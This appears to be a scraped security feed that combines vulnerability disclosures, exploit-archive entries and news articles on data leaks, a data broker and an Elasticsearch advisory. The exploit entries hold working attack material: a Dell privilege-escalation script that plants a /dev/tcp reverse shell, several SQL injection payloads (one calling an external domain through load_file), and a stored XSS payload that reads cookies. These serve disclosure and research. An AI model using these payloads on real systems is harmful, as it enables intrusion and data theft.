The server in Circontrol Raption versions through 5.11.2 has a pre-authentication stack-based buffer overflow that can be exploited to gain run-time control of the device as root. The pwrstudio web application of EV Charger (in the server in Circontrol Raption through 5.6.2) is vulnerable to OS command injection.

Circontrol EV Charger vulnerabilities.

1. CVE-2020-8006 Pre-Auth Stack Based Buffer Overflow  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10)

The server in Circontrol Raption through 5.11.2 has a pre-authentication  
stack-based buffer overflow that can be exploited to gain run-time control  
of the device as root.

When the server parses the HTTP headers and finds the Basic-Authentication  
tag it will call a base64 decode function. This function takes 3 arguments:  
an input pointer, an output pointer and a length. During the authentication  
flow, the input pointer can be an attacker controlled string of  
approximately 4096 characters, and the output pointer is located on the  
stack, the length argument is 512. While the length of the stack based  
buffer is passed to the decoder it only verifies that it is not smaller than  
3.

[Vendor of Product]

https://circontrol.com/

[Affected Product Code Base]

Raption Server - Raption up to 5.11.2

[Affected Component]

OCCP 1.5, OCCP.1.6, PWRSTUDIO

[Attack Type]

Remote

[Impact Code execution]

true

[Impact Denial of Service]

true

[Attack Vectors]

Remote

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Abert Spruyt, Alex Salvetti, Dariusz Gońda

[Reference]

https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/

2. CVE-2020-8007 - Command injection (RCE/authenticated)  
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L (9.1)

The pwrstudio web application of EV Charger (in the server in Circontrol  
Raption through 5.6.2) is  
vulnerable to OS command injection via three fields of the configuration  
menu for ntpserver0, ntpserver1, and pingip.

[VulnerabilityType Other]

Command Injection

[Vendor of Product]

https://circontrol.com/

[Affected Product Code Base]

Raption Server - up to 5.6.2

[Affected Component]

pwrstudio

[Attack Type]

Remote

[Impact Code execution]

true

[Attack Vectors]

To exploit this issue authorization is required.

[Has vendor confirmed or acknowledged the vulnerability?]

true

[Discoverer]

Abert Spruyt, Alex Salvetti, Dariusz Gońda

[Reference]

https://circontrol.com/intelligent-charging-solutions/dc-chargers-series/raption-150/

Circontrol Raption Buffer Overflow / Command Injection

FusionPBX suffers from a session fixation vulnerability.

*Vulnerability Name - *Application is Vulnerable to Session Fixation

*Vulnerable URL: *www.fusionpbx.com

*Overview of the Vulnerability*  
Session fixation is a security vulnerability that occurs when an attacker  
sets or fixes a user's session identifier, manipulating the authentication  
process. Typically exploited in web applications, this vulnerability allows  
the attacker to force a user's session ID to a known value, granting  
unauthorized access. Attackers can initiate the attack by tricking users  
into using a provided session ID or by planting a session ID through  
various means.

*Steps to Reproduce*  
Step 1: To reproduce this vulnerability open two browsers. Copy "PHPSESSID"  
cookie from Browser 1 and paste it to Browser 2.  
Step 2: Login in Browser 1 using valid credentials.  
Step 3: Navigate to Browser 2 and refresh the page or open this URL (  
https://www.fusionpbx.com/app/account/home.php)  
Step 4: Successfully logged in Browser 2 without entering the credentials.

*Impact of Vulnerability:*  
Anyone can easily hijack victims or user's sessions and get into his account  
. Cookie stealing is the best way the hacker can get into account.. it  
would not take more than 5 min to steal someone's cookie using PHP and all  
.....  
Even friends can fool the victim and get him hacked...

*Mitigation:*Manage sessions properly. This problem is mainly faced because  
the session doesn't get expired or doesn't get closed when logout is  
pressed. Each time the user logins the cookie must hold a unique different  
session-id to proceed.

------------------------------------------------------------------------------------------------------

*FusionPBX Development Team Implemented Fix GitHub Commit Links:*  
https://github.com/fusionpbx/fusionpbx/commit/50220d7a0674fae944a1e16fab7a8517cdc51a9e  
https://github.com/fusionpbx/fusionpbx/commit/560a51cff710df12c863de53c4c8289e1516dae8

FusionPBX Session Fixation

Dell Security Management Server versions prior to 11.9.0 suffer from a local privilege escalation vulnerability.

    # Exploit Title: [title] Dell Security Management Server versions prior to11.9.0# Exploit Author: [author] Amirhossein Bahramizadeh# CVE : [if applicable] CVE-2023-32479Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell SecurityManagementServer versions prior to 11.9.0 contain privilege escalation vulnerabilitydue to improper ACL of the non-default installation directory. A localmalicious user could potentially exploit this vulnerability by replacingbinaries in installed directory and taking the reverse shell of the systemleading to Privilege Escalation.#!/bin/bashINSTALL_DIR="/opt/dell"# Check if the installed directory has improper ACLsif [ -w "$INSTALL_DIR" ]; then    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"    chmod +x "$INSTALL_DIR/dell-exploit"    # Wait for the reverse shell to connect to your malicious server    nc -lvnp 1234fi

Dell Security Management Server Privilege Escalation

Purei CMS version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Purei CMS 1.0 - SQL Injection# Date: [27-03-2024]# Exploit Author: [Number 7]# Vendor Homepage: [purei.com]# Version: [1.0]# Tested on: [Linux]____________________________________________________________________________________Introduction:An SQL injection vulnerability permits attackers to modify backend SQL statements through manipulation of user input. Such an injection transpires when web applications accept user input directly inserted into an SQL statement without effectively filtering out hazardous characters.This could jeopardize the integrity of your database or reveal sensitive information.____________________________________________________________________________________Time-Based Blind SQL Injection:Vulnerable files:http://localhost/includes/getAllParks.phphttp://localhost/includes/getSearchMap.phpmake a POST request with the value of the am input set to :    if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ make sure to url encode the inputs.  SQL injection:Method: POST REQUESTVunerable file:/includes/events-ajax.php?action=getMonthdata for the POST req:month=3&type=&year=2024&cal_id=1[Inject Here]

Purei CMS 1.0 SQL Injection

Workout Journal App version 1.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: Workout Journal App 1.0 - Stored XSS# Date: 12.01.2024# Exploit Author: MURAT CAGRI ALIS# Vendor Homepage: https://www.sourcecodester.com<https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html># Software Link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html# Version: 1.0# Tested on: Windows / MacOS / Linux# CVE : CVE-2024-24050# DescriptionInstall and run the source code of the application on localhost. Register from the registration page at the url workout-journal/index.php. When registering, stored XSS payloads can be entered for the First and Last name on the page. When registering on this page, for the first_name parameter in the request to the /workout-journal/endpoint/add-user.php urlFor the last_name parameter, type " <script>console.log(document.cookie)</script> " and " <script>console.log(1337) </script> ". Then when you log in you will be redirected to /workout-journal/home.php. When you open the console here, you can see that Stored XSS is working. You can also see from the source code of the page that the payloads are working correctly. This vulnerability occurs when a user enters data without validation and then the browser is allowed to execute this code.# PoCRegister Request to /workout-journal/endpoints/add-user.phpPOST /workout-journal/endpoint/add-user.php HTTP/1.1Host: localhostContent-Length: 268Cache-Control: max-age=0sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/workout-journal/index.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=64s63vgqlnltujsrj64c5o0vciConnection: closefirst_name=%3Cscript%3Econsole.log%28document.cookie%29%3C%2Fscript%3E%29&last_name=%3Cscript%3Econsole.log%281337%29%3C%2Fscript%3E%29&weight=85&height=190&birthday=1991-11-20&contact_number=1234567890&email=test%40mail.mail&username=testusername&password=Test123456-This request turn back 200 Code on ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:05:52 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Content-Length: 214Connection: closeContent-Type: text/html; charset=UTF-8                <script>                    alert('Account Registered Successfully!');                    window.location.href = 'http://localhost/workout-journal/';                </script>After these all, you can go to login page and login to system with username and password. After that you can see that on console payloads had worked right./workout-journal/home.php RequestGET /workout-journal/home.php HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: http://localhost/workout-journal/endpoint/login.phpAccept-Encoding: gzip, deflate, brAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: PHPSESSID=co1vmea8hr1nctjvmid87fa7d1Connection: close/workout-journal/home.php ResponseHTTP/1.1 200 OKDate: Sat, 16 Mar 2024 02:07:56 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.4X-Powered-By: PHP/8.1.4Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 2791Connection: closeContent-Type: text/html; charset=UTF-8    <!DOCTYPE html>    <html lang="en">    <head>        <meta charset="UTF-8">        <meta name="viewport" content="width=device-width, initial-scale=1.0">        <title>Workout Journal App</title>                <link rel="stylesheet" href="./assets/style.css">                <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css">        <style>            body {                overflow: hidden;            }        </style>    </head>    <body>        <div class="main">            <nav class="navbar navbar-expand-lg navbar-dark bg-dark">                <a class="navbar-brand ml-3" href="#">Workout Journal App</a>                <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">                    <span class="navbar-toggler-icon"></span>                </button>                <div class="collapse navbar-collapse" id="navbarSupportedContent">                    <ul class="navbar-nav ml-auto">                    <li class="nav-item active">                        <a class="nav-link" href="./endpoint/logout.php">Log Out</a>                    </li>                </div>            </nav>            <div class="landing-page-container">                <div class="heading-container">                    <h2>Welcome <script>console.log(document.cookie);</script>) <script>console.log(1337);</script>)</h2>                    <p>What would you like to do today?</p>                </div>                <div class="select-option">                    <div class="read-journal" onclick="redirectToReadJournal()">                        <img src="./assets/read.jpg" alt="">                        <p>Read your past workout journals.</p>                    </div>                    <div class="write-journal" onclick="redirectToWriteJournal()">                        <img src="./assets/write.jpg" alt="">                        <p>Write your todays journal.</p>                    </div>                </div>            </div>        </div>                <script src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.slim.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/js/bootstrap.min.js"></script>                <script src="./assets/script.js"></script>    </body>    </html>

Workout Journal App 1.0 Cross Site Scripting

LMS PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/28/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=user/manage_user&id=7''' AND (SELECT 1734FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU    Type: UNION query    Title: MySQL UNION query (NULL) - 11 columns    Payload: page=user/manage_user&id=-2854' UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html)## Time spent:01:15:00

LMS PHP 1.0 SQL Injection

By Uzair Amir
Singapore, 28 March 2024 – GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report…
This is a post from HackRead.com Read the original post: GoPlus Report: Blockchain Networks Using API Security Data to Mitigate Web3 Threats

**Singapore, 28 March 2024** – GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report that highlights the growing, widespread use and potential of Web3 user security data to aid in risk management.

The findings of the report reveal a clear and growing demand for more advanced security tools that can effectively safeguard digital assets, verify the authenticity of nonfungible tokens (**NFTs**) and monitor decentralized applications for threats. 

The report, “Uncharted Consensus: The Widespread Use and Potential of User Security Data in Web3”, showcases the rapid adoption of GoPlus’s API suite, which provides Web3 industry stakeholders with unparalleled insights into the health and vulnerability of various cryptocurrencies, NFTs and decentralized applications. At the same time, it also underscores the unique role GoPlus plays in addressing Web3’s most pressing security challenges.

GoPlus is the developer of an API suite that’s designed to address the multifaceted challenges of Web3 user security, enabling targeted data analysis across key aspects of the industry. Its modules include a Token RIsk API and NFT Risk API that evaluate the risk associated with different cryptocurrencies and non-fungible tokens; a Malicious address API for monitoring and reporting malicious addresses; a dApp Security API for real-time monitoring and threat detection in decentralized applications; and an Approval API for checking malicious approval of an address.

The report shows there is rising demand for better Web3 security solutions, with GoPlus revealing that its Token Risk API saw a rapid increase in utilization from November 2023, with some months witnessing peaks of over 20 million calls per day.  This suggests that the crypto industry is collectively shifting towards pre-emptive risk identification and mitigation, driven by the evolving and intensifying landscape of security threats. 

These increases were mirrored by similar usage spikes in GoPlus’s other API modules. For instance, usage of its NFT API spiked between Dec. 2022 and Feb. 2023, and then several times again between March and May 2023, before stabilizing, followed by a sustained period of much steadier growth. These usage trends mirror the growing adoption of NFTs and the corresponding need for tools that can accurately assess the risks associated with these digital assets.

****Evolving Threat Landscape****

A closer analysis of the API usage data illustrated a significant fluctuation in the presence of “high-risk” tokens, reflecting a threat landscape that’s just as volatile as the crypto industry itself. The majority of these high-risk tokens were identified as being either “blacklisted” or “honeypots”, although many other kinds of threats were identified, illustrating the evolving tactics used by hackers and scammers in the industry. The report also found an exponential increase in threats associated with NFTs, such as privileged operations (burn and minting), restricted approvals, self-destruct mechanisms and unauthorized transfers.

The threat-related insights demonstrate the need for Web3 projects to employ more dynamic, robust and adaptable security strategies and countermeasures to deal with the evolving threat landscape, as well as the need for education and collaboration to increase awareness of these threats and find better ways to mitigate them.

****Top Ecosystems & Threats****

The comprehensive study also highlighted the differing levels of user engagement and **security concerns across blockchains**, providing perspective on the unique challenges and risks faced by each ecosystem. 

BNB Chain emerged as the most prominent user of GoPlus’s APIs, being queried more than 92.7 million times during the research period. This reflects Binance’s laudable achievement in fostering a large community that’s united in its determination to identify and proactively mitigate security risks such as token vulnerabilities and scams.

Ethereum was the second-most popular chain to leverage GoPlus, with users querying its APIs 84 million times, highlighting both the extent of its user base and its vigilance against vulnerabilities and scams. Meanwhile, Polygon also stood out with almost 9.8 million queries during the period. This high level of adoption in the much smaller Polygon community illustrates the strong emphasis it places on scaling security solutions for the Web3 industry. 

Other insights from the report include the top ten token risks faced by the crypto industry today, with further analysis uncovering ten tokens with characteristics that mark them out as being “particularly malicious”, and also the top ten NFT collections that could be perceived as risky, due to their close association with phishing scams.  

****The Importance Of User Security Insights****

The GoPlus report provides valuable insights into aspects such as user engagement, preferences and the nature of the evolving threats in Web3, which can be essential for stakeholders to make more informed decisions and mitigate the risks they face. 

Perhaps the most significant finding is that the report underlines the critical importance Web3 security data can play in helping the industry address the evolving risk landscape. As the Web3 ecosystem grows and evolves, the need for comprehensive security data will become all the more vital, helping dApp developers protect their users, while educating users on how to protect themselves.  

****About GoPlus Labs****

**GoPlus Labs** is revolutionizing Web3 security by offering a transparent, User Security Network with permissionless security data. It provides a User Security Module as a Service to any blockchain, utilizing advanced AI for comprehensive threat detection.

Notably, its security data infrastructure has seen a massive usage increase, the user security data usage has grown 5000x from 2022 to now, with daily data API calls 21M.

SecwareX, launched in March 2024, quickly gained significant traction, showcasing high user trust. Within its first two weeks, it attracted over 400,000 users, including more than 30,000 premium (paid) users, highlighting its immediate impact and user trust.

GoPlus enhances Web3 user security through broad support for over 20 chains, collaboration with RaaS and Layer2 partners like Altlayer, zkSync, and Manta, and the introduction of innovative products like the “Secscan” security engine and Secware Middleware. These advancements facilitate a more open data and computing layer, moving towards gradual decentralization.

Goplus enhances Web3 user security and promotes decentralization by motivating user participation with its token system. The Goplus Token will act as a “gas fee,” necessary to reinforce the user security network and expand its utility. Moreover, it encourages users to become SecWare Service Providers, Data Providers, and Computing Node Providers. By contributing to the network, these participants can earn Goplus Tokens.

GoPlus Report: Blockchain Networks Using API Security Data to Mitigate Web3 Threats

By Waqas
Hundreds of thousands of UK student records exposed in software firm's server leak putting names, grades, and photos at risk - Learn more about the school software breach and how to protect your child's information.
This is a post from HackRead.com Read the original post: Trove of UK Student Records Exposed in School Software Server Leak

Cybersecurity researcher Jeremiah Fowler identified a **misconfigured cloud server** that impacted hundreds of thousands of students in the United Kingdom. Fowler disclosed his findings through WebsitePlanet, outlining how a UK-based school tracking software provider unintentionally exposed individuals to the risk of a data breach.

In the **report** shared with Hackread.com prior to its publication on Wednesday, March 27, 2024, it was revealed that the server contained almost a million (864,603) records, with approximately 214,000 of them being unique images of children.

In addition to the images, the exposed database contained sensitive information including student names, enrolled subjects, academic achievements, and indications of learning disabilities. Shockingly, these records covered a period from 2017 to 2023.

Screenshot from the exposed server (Credit: Website Planet)

According to Fowler, the server was affiliated with **OTrack**, also known as Optimum Pupil/Sonar Tracker, developed by Juniper Education. OTrack is utilized by over 7,000 primary and secondary schools across the United Kingdom and is an effective platform for tracking pupil performance and managing schools.

It is a fact that schools are one of **the most targeted industries** however, a data leak related to student software is not new. Earlier in January this year, Fowler reported similar findings impacting students from a Texas-based school when its safety software provider developed by **Raptor Technologies exposed** around 4,024,001 records to the public.

Upon discovering the misconfiguration, Fowler promptly notified the responsible parties through a responsible disclosure notice, leading to the swift closure of public access to the server.

However, the question remains whether unauthorized individuals had accessed it and to what extent the data may have been misused. The full scope of the data leak can be uncovered only through an internal forensic audit.

Another worth mentioning positive outcome is that, **unlike businesses that deny data breaches**, the company’s data protection officer, representing Juniper Education, assured that an investigation would be carried out.

Nevertheless, the server misconfiguration goes on to show the critical importance of prioritizing proper cybersecurity measures, especially when dealing with the sensitive data of minors. With educational institutions relying more on digital platforms, it’s critical to take precautions to effectively secure student information.

1.  Database Leaks 153GB of Filipino Student and Family Data
2.  900 U.S. Schools Hit by MOVEit Hack, Exposing Student Data
3.  Hackers Attack UK’s Nuclear Waste Services Through LinkedIn
4.  Conti ransomware gang demanded $40m from US school district
5.  Tycoon and Storm-1575 Linked to Phishing Attacks on US Schools

Trove of UK Student Records Exposed in School Software Server Leak

A WIRED investigation uncovered coordinates collected by a controversial data broker that reveal sensitive information about visitors to an island once owned by Epstein, the notorious sex offender.

Nearly 200 mobile devices of people who visited Jeffrey Epstein’s notorious “pedophile island” in the years prior to his death left an invisible trail of data pointing back to their own homes and offices. Maps of these visitations generated by a troubled international data broker with defense industry ties, discovered last week by WIRED, document the numerous trips of wealthy and influential individuals seemingly undeterred by Epstein’s status as a convicted sex offender.

The data amassed by Near Intelligence, a location data broker roiled by allegations of mismanagement and fraud, reveals with high precision the residences of many guests of Little Saint James, a United States Virgin Islands property where Epstein is accused of having groomed, assaulted, and trafficked countless women and girls.

Some girls, prosecutors say, were as young as 14. The former attorney general of the US Virgin Islands alleged that girls as young as 12 were trafficked to Epstein by those within his elite social circle.

The coordinates that Near Intelligence collected and left exposed online pinpoint locations to within a few centimeters of space. Visitors were tracked as they moved from the Ritz-Carlton on neighboring St. Thomas Island, for instance, to a specific dock at the American Yacht Harbor—a marina once co-owned by Epstein that hosts an “impressive array” of pleasure boats and mega-yachts. The data pinpointed their movements as they were transported to Epstein’s dock on Little St. James, revealing the exact routes taken to the island.

The tracking continued after they arrived. From inside Epstein's enigmatic waterfront temple to the pristine beaches, pools, and cabanas scattered across his 71-acres of prime archipelagic real estate, the data compiled by Near captures the movements of scores of people who sojourned at Little St. James as early as July 2016. The recorded surveillance concludes on July 6, 2019—the day of Epstein’s final arrest.

Eleven years earlier, the disgraced financier was sentenced to 18 months in jail after a guilty plea in 2008 for soliciting and procuring a minor engaged in prostitution, securing a secret “sweetheart” deal to avoid any federal charges. Renewed interest in the case, notably prompted by a _Miami Herald_ investigation, spawned new charges against Epstein, who was apprehended at New Jersey’s Teterboro Airport in July 2019. A raid of Epstein’s Manhattan townhouse by federal agents yielded a cache of child sexual abuse material, nearly 50 individually cut diamonds, and a fraudulent Saudia Arabian passport, which had expired. He reportedly died by suicide a month later while incarcerated at the Metropolitan Correctional Center, a federal detention facility that closed shortly after Epstein’s death.

Ghislaine Maxwell, former British socialite and an Epstein accomplice, was convicted in 2021 on five counts including sexual trafficking of children by force. Maxwell was arrested in New Hampshire, tracked to a million-dollar home by federal agents using location data pulled from her cell phone.

Little is known publicly about Epstein’s activities in the decade prior to his 2019 arrest. The majority of women who came forward that year to accuse the convicted pedophile in court say they were assaulted in the ’90s and early 2000s.

Now, however, 11,279 coordinates obtained by WIRED show not only a flood of traffic to Epstein’s island property—nearly a decade after his conviction as a sex offender—but also point to as many as 166 locations throughout the US where Near Intelligence infers that visitors to Little St. James likely lived and worked. The cache also points to cities in Ukraine, the Cayman Islands, and Australia, among others.

Near Intelligence, for example, tracked devices visiting Little St. James from locations in 80 cities crisscrossing 26 US states and territories, with Florida, Massachusetts, Texas, Michigan, and New York topping the list. The coordinates point to mansions in gated communities in Michigan and Florida; homes in Martha’s Vineyard and Nantucket in Massachusetts; a nightclub in Miami; and the sidewalk across the street from Trump Tower on Fifth Avenue in New York City.

The coordinates also point to various Epstein properties beyond Little St. James, including his 8,000-acre New Mexico ranch and a waterfront mansion on El Brillo Way in Palm Beach, where prosecutors said in an indictment that Epstein trafficked numerous “minor girls” for the purposes of molesting and abusing them. Near’s data is notably missing any locations in Europe, where citizens are safeguarded by comprehensive privacy laws.

Near Intelligence’s maps of Epstein’s island reveal in stark detail the precision surveillance that data brokers can achieve with the aid of loose privacy restrictions under US law. The firm, which has roots in Singapore and Bengaluru, India, sources its location data from advertising exchanges—companies that quietly interact with billions of devices as users browse the web and move about the world.

Before a targeted advertisement appears on an app or website, phones and other devices send information about their owners to real-time bidding platforms and ad exchanges, frequently including users’ location data. While advertisers can use this data to inform their bidding decisions, companies like Near Intelligence will siphon, repackage, analyze, and sell it.

Several ad exchanges, according to _The Wall Street Journal_, have reportedly terminated arrangements with Near, claiming that its use of their data violated the exchanges’ terms of service.

Officially, this data is intended to be used by companies hoping to determine where potential customers work and reside. But in October 2023, the _Journal_ revealed that Near had once provided data to the US military via a maze of obscure marketing companies, cutouts, and conduits to defense contractors. Bankruptcy records reviewed by WIRED show that in April 2023, Near Intelligence signed a yearlong contract with another firm called nContext, a subsidiary of the defense contractor Sierra Nevada.

nContext secured six federal contracts to provide data in support of the National Security Agency and the Defense Counterintelligence and Security Agency, according to reporting by Byron Tau, author of _Means of Control_, an exposé of the data-broker industry and its ties to the US surveillance state. According to information released during a $100 million funding round in 2019, Near claims to have information on roughly 1.6 billion people in 44 countries.

“The pervasive surveillance machine that has been developed for digital advertising now enables other uses completely unrelated to marketing, including government mass surveillance,” says Wolfie Christl, a Vienna-based researcher at Cracked Labs who investigates the data industry.

The data on Epstein’s guests was produced using an intelligence platform formerly known as Vista, which has now been folded into a product called Pinnacle. WIRED discovered several so-called Vista reports while examining Pinnacle’s publicly accessible code. While the specific URLs for the reports are difficult to find, Google’s web crawlers were able to locate at least two other publicly accessible Vista reports: one geofencing the Westfield Mall of the Netherlands and another targeting Saipan-Ledo Park in El Paso, Texas.

The Little St. James report features five maps, one of which reveals locations of devices observed on the island over more than three years prior to Epstein’s arrest. Two of the maps indicate the inferred “Common Evening Locations” and “Common Daytime Locations” for each device that had visited the island. According to the Vista report, these metrics are meant to show visitors’ “most frequented location on weekdays” as well as weeknights and weekends.

A fourth map shows the “general geographic areas from which a location generates the majority of its visits.” The fifth details visitors’ locations 30 minutes before and after they arrived on Epstein’s island, producing a trail of signals that show phones and other devices carried over by helicopter and boat from the main island.

WIRED extracted the location data from the charts and maps to conduct its analysis, which is ongoing. For this story, we reproduced some of the maps created by Near, while excluding any precise location data that could be used to identify properties or individuals, to protect the privacy of anyone uninvolved in Epstein’s crimes.

Crippled by debt, Near Intelligence filed for bankruptcy protection in December, reporting liabilities of approximately $100 million, less than a year after being listed by Nasdaq. An independent investigation commissioned by the company's board alleged multiple executives engaged in a years-long “concealed scheme” to cheat the company out of tens of millions of dollars. (One of those former executives has filed a claim against the company alleging defamation.)

Near Intelligence has since quietly resumed operations, under the same leadership that initiated the bankruptcy proceedings, rebranding itself as a newly incorporated entity called Azira.

US senator Ron Wyden in early February urged federal regulators to launch investigations into Near Intelligence, citing reporting by _The Wall Street Journal_ that found its platform had been used by a third party to geofence “sensitive locations,” including roughly 600 reproductive health clinics at the behest of a conservative group that waged a multiyear antiabortion campaign. US regulators have begun to designate certain types of locations “sensitive,” including health clinics, domestic abuse shelters, and places of religious worship, in an attempt to shield Americans from predatory data brokers amid the US Congress’s years-long failure to pass a comprehensive privacy law.

In an email to WIRED, Kathleen Wailes, speaking on behalf of Azira, acknowledged that Near Intelligence had deliberately collected the data on Epstein’s island for its own purposes. Wailes declined multiple invitations to discuss how the data was collected, which prospective client may have created the report of Epstein’s island, and what purpose it served.

Image: WIRED/Flourish

“Azira is committed to data privacy and responsible access to and use of location data,” Wailes said. “To this end, Azira works to track and respond to legal developments under emerging new state laws, FTC guidance and prior enforcement examples, and best practices. Azira is developing procedures to protect consumers' sensitive location data. This includes working to disable all sample offering accounts created by Near.”

Although the discovery of the Epstein island data involved many additional steps, WIRED also found it could be easily retrieved with a simple Google search.

A Department of Justice spokesperson for the US District Court for the Southern District of New York, where Epstein was prosecuted in 2019, declined to comment on whether its investigators ever did business with Near.

While many of the coordinates captured by Near point to multimillion-dollar homes in numerous US states, others point to lower-income areas where Epstein victims are known to have lived and attended school, including areas of West Palm Beach, Florida, where police and a private investigator say they located around 40 of Epstein’s victims.

"Most of the clients who come to me, their number one concern is privacy and safety,” says attorney Lisa Bloom, who represented 11 of Epstein's alleged victims. “It's deeply concerning to think that any sexual abuse victims’ location will be tracked and then stored and then sold to someone, who can presumably do whatever they want with it.”

Legislation introduced during multiple sessions of Congress have aimed to restrict the sale of location data, chiefly to prevent US law enforcement and intelligence agencies from tracking Americans without a warrant. So far, those efforts have failed. Separately, US president Joe Biden issued an executive order in February instructing the Justice Department to establish new rules preventing US companies from selling data to rival nations, which might include Iran, China, Russia, and North Korea. This order is unlikely to impact Azira’s business in the United States.

“The fact that they have this data in the first place and are allowing people to share it is certainly disturbing,” says Eva Galperin, the director of cybersecurity at the Electronic Frontier Foundation, a digital-rights nonprofit. “I just don’t know how many more of these stories we need to have in order to get strong privacy regulations.”

Jeffrey Epstein's Island Visitors Exposed by Data Broker

Incorrect Authorization issue exists in the API key based security model for Remote Cluster Security, which is currently in Beta, in Elasticsearch 8.10.0 and before 8.13.0. This allows a malicious user with a valid API key for a remote cluster configured to use the new Remote Cluster Security to read arbitrary documents from any index on the remote cluster, and only if they use the Elasticsearch custom transport protocol to issue requests with the target index ID, the shard ID and the document ID. None of Elasticsearch REST API endpoints are affected by this issue.

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-23451

**Elasticsearch Incorrect Authorization vulnerability**

Moderate severity GitHub Reviewed Published Mar 27, 2024 to the GitHub Advisory Database • Updated Mar 27, 2024

**Package**

maven org.elasticsearch:elasticsearch (Maven)

**Affected versions**

\>= 8.10.0, < 8.13.0

